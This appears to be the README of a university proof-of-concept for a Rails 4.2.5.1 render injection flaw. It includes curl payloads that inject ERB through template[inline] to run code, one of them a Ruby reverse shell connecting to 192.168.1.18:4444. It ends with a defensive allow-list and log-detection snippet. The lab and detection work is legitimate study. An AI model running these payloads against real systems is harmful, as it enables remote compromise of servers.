University project created by @alejandro-marting where we can check vulnerability 2096.
Using:
- rails 4.2.5.1
- a view with vulnerable code: app/views/poc/render1.html.erb
## Execution

First, run the Rails server with the following command:

```
$ rvmsudo rails server -b 0.0.0.0 -p 80
```
Now we can trigger remote code execution with the following command:

```
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
```

(A file named `rooted` should be generated.)
If you want to try a reverse shell via Ruby code injection, you can run the following command:

```
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : { "inline" : "<%= require \'socket\';exit if fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end %>"}}' http://localhost:3000/poc/render1
```
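The root cause exercised above is a user-controlled hash (`template[inline]`, whether from the query string or a JSON body) reaching `render`, so ActionView evaluates request-supplied ERB. The following is an added defensive example, not code from this project: a hardened allow-list replacement for such a render call, plus detection logic that flags the two request shapes shown above in constructed Rails log lines. `ALLOWED_TEMPLATES` and the log lines are hypothetical.

```ruby
require 'cgi'

# Render option keys that let a request-supplied hash make ActionView evaluate
# inline ERB or read arbitrary files when it is passed straight to `render`.
DANGEROUS_RENDER_KEYS = %w[inline file].freeze

# Hypothetical allow-list of template names the controller may render.
ALLOWED_TEMPLATES = %w[poc/render1].freeze

# Hardened replacement for `render params[:template]`: only a plain template
# name on the allow-list is accepted; a nested hash (e.g. {"inline"=>...}) is rejected.
def safe_render_options(params)
  name = params['template'].to_s
  raise ArgumentError, "template not allowed: #{name.inspect}" unless ALLOWED_TEMPLATES.include?(name)
  { template: name }
end

# Does a request path carry a template[inline] / template[file] query parameter?
def suspicious_request?(path)
  query = path.split('?', 2)[1] or return false
  CGI.parse(query).keys.any? do |key|
    key =~ /\Atemplate\[(#{DANGEROUS_RENDER_KEYS.join('|')})\]\z/
  end
end

# Return the Rails log lines that show an attempt to inject render options.
def flag_template_injection(log_lines)
  log_lines.select do |line|
    if (m = line.match(/\AStarted \S+ "([^"]+)"/))
      suspicious_request?(m[1])
    else
      # JSON/form bodies are not in the URL; Rails logs them on a Parameters: line.
      line =~ /Parameters: .*"template"=>\{"(#{DANGEROUS_RENDER_KEYS.join('|')})"/
    end
  end
end

# Constructed sample log lines (not real traffic): lines 1 and 3 should be flagged.
SAMPLE_LOG = [
  'Started GET "/poc/render1?template[inline]=%3C%25%3D+1%2B1+%25%3E" for 127.0.0.1 at 2016-03-01 10:00:00 +0000',
  'Started GET "/poc/render1?template=poc/render1" for 127.0.0.1 at 2016-03-01 10:00:01 +0000',
  '  Parameters: {"template"=>{"inline"=>"<%= 1+1 %>"}}',
  'Started GET "/assets/app.css" for 127.0.0.1 at 2016-03-01 10:00:02 +0000'
].freeze

puts flag_template_injection(SAMPLE_LOG) if $PROGRAM_NAME == __FILE__
```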
If you have any questions, please contact me!